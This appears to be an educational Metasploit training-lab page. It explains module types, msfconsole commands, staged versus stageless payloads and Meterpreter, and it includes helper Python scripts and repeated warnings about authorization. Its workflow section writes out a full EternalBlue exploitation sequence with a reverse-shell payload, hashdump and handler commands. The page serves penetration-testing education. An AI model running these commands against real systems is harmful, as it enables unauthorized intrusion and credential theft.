What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform maintained by Rapid7 and a large community, and the most widely used one. It provides a standardized workflow for discovering, exploiting, and validating vulnerabilities in systems, applications, and networks. Think of it as a "Swiss Army knife for ethical hackers": a comprehensive toolkit that automates much of the manual work involved in penetration testing.

CRITICAL: Legal and Ethical Use Only

Metasploit is a powerful tool that MUST ONLY be used on systems you own or have explicit written authorization to test. Unauthorized access to computer systems is a serious crime punishable by law. This lab teaches concepts and methodology - NOT how to attack real systems.

Why Do We Need Metasploit?

  • Vulnerability Validation: Prove that a discovered vulnerability is actually exploitable
  • Penetration Testing: Simulate real-world attacks to assess security posture
  • Security Research: Develop and test new exploit techniques safely
  • Red Team Operations: Test organizational defenses with realistic adversarial scenarios
  • Post-Exploitation: Assess damage potential once a system is compromised

The Penetration Testing Lifecycle

  1. Reconnaissance: Gather information about the target (passive and active)
  2. Scanning & Enumeration: Identify live hosts, open ports, and running services
  3. Vulnerability Analysis: Detect potential security weaknesses
  4. Exploitation: Attempt to gain access using discovered vulnerabilities
  5. Post-Exploitation: Maintain access, escalate privileges, pivot to other systems
  6. Reporting: Document findings and recommend remediation

Key Concept

Metasploit primarily assists with phases 4 (Exploitation) and 5 (Post-Exploitation). Its auxiliary modules cover some of phases 2 and 3 (port, version and credential scanners), but it is not a complete solution: you still need dedicated reconnaissance, scanning, and vulnerability assessment tools such as Nmap, Nessus, or OpenVAS, and most engagements import those results into Metasploit's database rather than rediscovering them.

Metasploit Architecture

Understanding Metasploit's modular architecture is essential. Each module type serves a specific purpose in the testing workflow.

1. Exploits

Exploits are pieces of code that take advantage of a vulnerability to compromise a target system. They leverage flaws in software, configurations, or protocols to gain unauthorized access.

exploit/windows/smb/ms17_010_eternalblue # Exploits SMB vulnerability
exploit/multi/handler # Generic payload handler
exploit/linux/http/apache_mod_cgi_bash_env_exec # Shellshock

2. Payloads

Payloads are the code that runs on the target system AFTER exploitation succeeds. They define what you want to do once you have access.

windows/meterpreter/reverse_tcp # Meterpreter shell (Windows)
linux/x64/shell/reverse_tcp # Command shell (Linux)
cmd/unix/reverse_python # Python-based reverse shell

Common Confusion: Exploit vs Payload

Exploit: The delivery mechanism - HOW you get in (exploits a vulnerability)
Payload: What you do once inside - WHAT you want to run on the target

Analogy: The exploit is the key that unlocks the door. The payload is what you do once you're inside the house.

3. Auxiliary Modules

Auxiliary modules perform supporting tasks that don't directly exploit vulnerabilities but assist in reconnaissance, scanning, and information gathering.

auxiliary/scanner/portscan/tcp # TCP port scanner
auxiliary/scanner/smb/smb_version # SMB version detection
auxiliary/scanner/http/http_version # Web server fingerprinting

4. Post-Exploitation Modules

These modules run AFTER you've already compromised a system. They help with privilege escalation, lateral movement, data collection, and maintaining persistence.

post/windows/gather/hashdump # Extract password hashes
post/multi/recon/local_exploit_suggester # Find privilege escalation paths
post/windows/manage/migrate # Move to different process

Understanding msfconsole

The msfconsole is Metasploit's primary command-line interface. It provides an interactive environment for selecting modules, configuring options, and launching attacks.

Basic Navigation Commands

help # Show all available commands
search [keyword] # Search for modules
use [module_path] # Select a module to use
info # Show detailed information about current module
show options # Display configurable options
show payloads # List compatible payloads
set [option] [value] # Configure an option
exploit or run # Execute the module
back # Return to main console
exit # Quit msfconsole

Searching for Modules

search smb # Search for SMB-related modules
search type:exploit platform:windows # Filter by type and platform
search cve:2017 rank:excellent # Search by CVE and reliability rank

Pro Tip: Module Ranks

Modules are ranked by reliability: Excellent > Great > Good > Normal > Average > Low > Manual. Prefer "Excellent" or "Great" ranked modules on real engagements; lower ranks are more likely to crash the target service or need hand-tuned targets, and "Manual" means the module is essentially a framework for you to drive yourself.

Stagers and Stages (Advanced Concept)

Payload names like windows/meterpreter/reverse_tcp encode how the payload is delivered. Many Metasploit payloads are split into a stager (the small piece the exploit actually delivers, which only sets up the transport, for example reverse_tcp) and a stage (the larger code that does the real work, for example meterpreter).

Staged Payloads (stage and stager joined by a slash /)

Example: windows/meterpreter/reverse_tcp

  • Two-step delivery: the exploit delivers only the small stager
  • The stager connects back to the handler (exploit/multi/handler or the exploit's own listener), which sends the full stage over that connection
  • Advantage: small initial footprint, which matters when the exploit's buffer has tight size limits
  • Disadvantage: the handler must be reachable and configured with the same payload at the moment the stager runs, and the second transfer fails on a flaky connection

Stageless Payloads (stage and stager joined by an underscore _)

Example: windows/meterpreter_reverse_tcp

  • Single delivery: stager and stage are compiled into one blob, so everything arrives at once
  • Advantage: no second transfer, so it survives unreliable links and does not depend on the handler pushing a stage; easier to troubleshoot
  • Disadvantage: much larger, so it may not fit exploits with size constraints

Caveat: not every slash marks a stage/stager split. A "single" payload such as cmd/unix/reverse_python is self-contained despite its slashes; the slash-vs-underscore rule applies to the stage name (meterpreter, shell, ...) and the part that follows it. Handler and payload must also match exactly: set the handler's PAYLOAD to the same name you gave the target, because a staged handler talking to a stageless payload (or vice versa) will not produce a working session.

When to Use Each

Staged: tight space constraints, reliable network between target and handler
Stageless: unstable networks, or whenever reliability matters more than size
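The naming rule above, as an added example that is not part of Metasploit: a small parser that splits a payload name into platform, architecture, stage and stager and classifies it as staged, stageless or single, plus the handler lines that must use the exact same name. The STAGE_NAMES and ARCHES lists are assumptions of this example, not pulled from the framework.

```python
"""Classify Metasploit payload names by the stage/stager naming convention.

Added example; STAGE_NAMES and ARCHES are assumed lists, not framework data."""
from dataclasses import dataclass
from typing import List, Optional

# Stage names that can be paired with a stager (assumed list for this example).
STAGE_NAMES = ("meterpreter", "shell", "vncinject", "dllinject", "upexec",
               "patchupmeterpreter", "patchupdllinject", "custom")
# Architecture components that may follow the platform (assumed list).
ARCHES = ("x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe",
          "mips64", "ppc", "ppc64", "sparc", "x86_64")


@dataclass
class PayloadName:
    raw: str
    platform: str
    arch: Optional[str]      # None when the name carries no explicit architecture
    stage: Optional[str]     # e.g. "meterpreter"; None for single payloads
    stager: Optional[str]    # e.g. "reverse_tcp"; None for single payloads
    kind: str                # "staged", "stageless" or "single"


def parse_payload_name(name: str) -> PayloadName:
    parts = name.strip().strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload name: {name!r}")
    platform = parts[0]
    arch = parts[1] if len(parts) > 2 and parts[1] in ARCHES else None
    rest = parts[2:] if arch else parts[1:]
    # Staged: stage and stager are separate path components (meterpreter/reverse_tcp)
    if len(rest) >= 2 and rest[-2] in STAGE_NAMES:
        return PayloadName(name, platform, arch, rest[-2], rest[-1], "staged")
    # Stageless: stage and stager fused with an underscore (meterpreter_reverse_tcp)
    last = rest[-1]
    for stage in STAGE_NAMES:
        if last.startswith(stage + "_"):
            return PayloadName(name, platform, arch, stage,
                               last[len(stage) + 1:], "stageless")
    # Anything else is a single, self-contained payload despite the slashes
    return PayloadName(name, platform, arch, None, None, "single")


def handler_commands(payload: str, lhost: str, lport: int) -> List[str]:
    """msfconsole lines for a catch-all handler. PAYLOAD must be the exact name
    the target was given; a staged/stageless mismatch yields no usable session."""
    return ["use exploit/multi/handler", f"set PAYLOAD {payload}",
            f"set LHOST {lhost}", f"set LPORT {lport}", "exploit -j"]


if __name__ == "__main__":
    for n in ("windows/x64/meterpreter/reverse_tcp", "windows/meterpreter_reverse_tcp",
              "linux/x64/shell/reverse_tcp", "cmd/unix/reverse_python"):
        p = parse_payload_name(n)
        print(f"{n:45} {p.kind:9} stage={p.stage} stager={p.stager} arch={p.arch}")
    print("\n".join(handler_commands("windows/meterpreter_reverse_tcp", "192.168.1.50", 4444)))
```

The classifier is a heuristic over the name only; when in doubt, `info` on the payload inside msfconsole is authoritative.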

Meterpreter: The Power Tool

Meterpreter is Metasploit's advanced payload that provides a powerful post-exploitation platform. Unlike a simple shell, Meterpreter runs entirely in memory and offers sophisticated capabilities.

Why Meterpreter is Special

  • Memory Resident: the Windows stage is injected reflectively into the host process and does not touch disk, so file-based scanning misses it (memory scanners and EDR can still see it)
  • Encrypted Communication: current Meterpreter negotiates an encrypted channel on top of whatever transport it uses, and reverse_https wraps it in TLS as well; note that the initial stage of a staged reverse_tcp payload still crosses the wire in the clear
  • Extensible: Load additional extensions (stdapi, priv, kiwi, ...) on the fly with `load`
  • Cross-Platform: Works on Windows, Linux, macOS, Android, with Java, PHP and Python variants as well

Essential Meterpreter Commands

sysinfo # Display system information
getuid # Show current user
ps # List running processes
migrate [PID] # Move to another process (for stability, or to leave a process that may exit)
hashdump # Dump password hashes
screenshot # Capture screen
download [remote] [local] # Download files
upload [local] [remote] # Upload files
shell # Drop into system shell
background # Background current session

Rules of Engagement and Ethics

MANDATORY REQUIREMENTS

Before conducting ANY penetration testing with Metasploit:

  1. Written Authorization: Obtain explicit, signed permission from the system owner
  2. Scope Definition: Clearly define which systems, networks, and timeframes are in-scope
  3. Rules of Engagement (ROE): Document what actions are permitted and prohibited
  4. Emergency Contacts: Have escalation procedures if something goes wrong
  5. Legal Review: Ensure compliance with applicable laws and regulations

What Can Go Wrong

  • Exploits can crash systems and cause downtime
  • Production data could be corrupted or lost
  • Network performance may be impacted
  • Security tools may trigger, alerting defenders
  • Legal liability if authorization is unclear

Legal Consequences

In the United States, unauthorized access to computer systems violates the Computer Fraud and Abuse Act (CFAA) and can result in criminal charges, fines up to $250,000, and imprisonment up to 20 years for repeat offenses. Other countries have similar laws.

Ethical Testing Principles

  • Confidentiality: Protect client data and findings
  • Integrity: Report all findings accurately, including those that don't favor your conclusions
  • Professionalism: Conduct tests during agreed timeframes with minimal disruption
  • Due Care: Take precautions to avoid causing damage
  • Disclosure: Provide clients with actionable remediation guidance

Ready to Practice?

Head to the Console Lab tab to practice Metasploit commands in a safe, simulated environment. Then test your skills in the Challenges section!

Safe Learning Environment

The Console Lab provides a simulated msfconsole with educational responses. No actual exploitation occurs - you're learning the workflow and command structure safely.

       =[ metasploit v6.3.45-dev                          ]
+ -- --=[ 2376 exploits - 1234 auxiliary - 413 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops          ]
+ -- --=[ 9 evasion                                       ]
                                
Metasploit tip: Use the 'search' command to find modules by keyword, CVE, or platform.
EDUCATIONAL SIMULATOR - No actual exploitation occurs in this lab
Type 'help' for available commands or try: search smb
msf6 >

Search Commands

search [keyword] # Search for modules by keyword
search type:exploit [keyword] # Search only exploit modules
search platform:windows # Search by target platform
search cve:YYYY # Search by CVE year (cve:YYYY-NNNN for one specific CVE)

Module Selection

use [module_path] # Select a module to configure
info # Show detailed module information
show options # Display configurable options
show payloads # List compatible payloads
show targets # Display available target versions
back # Return to main msfconsole prompt

Configuration

set RHOSTS [target] # Set remote target host(s): single IP, space-separated list, or CIDR
set LHOST [attacker_ip] # Set local (attacker) IP address the payload calls back to
set LPORT [port] # Set local listening port
set PAYLOAD [payload_path] # Choose what runs on target after exploit
setg [option] [value] # Set global option (persists across modules)
unset [option] # Clear an option value

Execution

exploit # Run the configured exploit
run # Alternative to 'exploit' (same function)
exploit -j # Run as background job
check # Check if target is vulnerable without exploiting it (only for modules that implement a check)

Session Management

sessions # List all active sessions
sessions -i [id] # Interact with specific session
sessions -k [id] # Kill a session
background # Background current session (Ctrl+Z)

Meterpreter Commands

sysinfo # Display target system information
getuid # Show the user account the session is running as
ps # List running processes
migrate [PID] # Move to different process for stability
hashdump # Dump password hashes (requires SYSTEM privileges)
screenshot # Capture target screen
shell # Drop into system command shell
download [remote] [local] # Download file from target

Auxiliary Modules

auxiliary/scanner/portscan/tcp # TCP port scanning
auxiliary/scanner/smb/smb_version # Detect SMB version
auxiliary/scanner/http/http_version # Fingerprint web servers
auxiliary/scanner/ssh/ssh_login # SSH brute force / credential testing

Common Workflows

# Basic exploitation workflow
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

# Once you have a Meterpreter session
sysinfo
getuid
ps
migrate 1234
hashdump
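The workflow above turned into an msfconsole resource script, as an added example that is not part of Metasploit or this lab: the function refuses to emit any commands until every RHOSTS entry is inside the authorized scope from the rules of engagement, then writes the same use/set/exploit -j lines shown above so they can be replayed with `msfconsole -r <file>`. The scope networks, target addresses and file name are constructed for this example.

```python
"""Generate an msfconsole resource script only for in-scope targets.

Added example; scope, hosts and file name below are constructed, not real."""
import ipaddress
import tempfile
from typing import Iterable, List


class ScopeError(ValueError):
    """Raised when a target is not covered by the authorized scope."""


def in_scope(target: str, scope: Iterable[str]) -> bool:
    """True if `target` (single IP or CIDR) lies entirely inside one authorized network."""
    wanted = ipaddress.ip_network(target, strict=False)
    for net in scope:
        allowed = ipaddress.ip_network(net, strict=False)
        # subnet_of() raises on an IPv4/IPv6 mismatch; such networks never overlap
        if wanted.version == allowed.version and wanted.subnet_of(allowed):
            return True
    return False


def build_resource_script(module: str, rhosts: List[str], payload: str,
                          lhost: str, lport: int, scope: List[str]) -> str:
    """Return msfconsole commands for the workflow, or raise if any target is out of scope."""
    bad = [h for h in rhosts if not in_scope(h, scope)]
    if bad:
        raise ScopeError(f"targets outside authorized scope: {', '.join(bad)}")
    lines = [
        f"use {module}",
        f"set RHOSTS {' '.join(rhosts)}",   # RHOSTS accepts space-separated hosts or CIDRs
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "show options",
        "exploit -j",                        # background job; interact with sessions -i
    ]
    return "\n".join(lines) + "\n"


def write_resource_script(text: str, suffix: str = ".rc") -> str:
    """Write the script to a temp file and return its path (for msfconsole -r)."""
    with tempfile.NamedTemporaryFile("w", suffix=suffix, delete=False) as fh:
        fh.write(text)
        return fh.name


if __name__ == "__main__":
    # Constructed engagement: only 192.168.1.0/24 is authorized.
    scope = ["192.168.1.0/24"]
    script = build_resource_script("exploit/windows/smb/ms17_010_eternalblue",
                                   ["192.168.1.100"], "windows/x64/meterpreter/reverse_tcp",
                                   "192.168.1.50", 4444, scope)
    path = write_resource_script(script)
    print(f"# run with: msfconsole -q -r {path}\n{script}")
    try:
        build_resource_script("exploit/windows/smb/ms17_010_eternalblue",
                              ["192.168.1.100", "10.0.0.5"], "windows/x64/meterpreter/reverse_tcp",
                              "192.168.1.50", 4444, scope)
    except ScopeError as err:
        print(f"refused: {err}")
```

The check is deliberately strict: a CIDR in RHOSTS must be entirely inside an authorized network, so a typo that widens the range (192.168.0.0/16 instead of 192.168.1.0/24) is rejected rather than partially scanned.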

About This Lab

This Metasploit Training Lab is an educational simulator designed to teach penetration testing concepts, Metasploit Framework architecture, and ethical hacking methodology in a safe, controlled environment. No actual exploitation occurs in this lab.

REMINDER: Real penetration testing requires written authorization, clearly defined rules of engagement, and strict adherence to legal and ethical guidelines. Unauthorized access to computer systems is illegal.

Version: 1.0.0
Part of: Hexworth Prime - Dark Arts Vault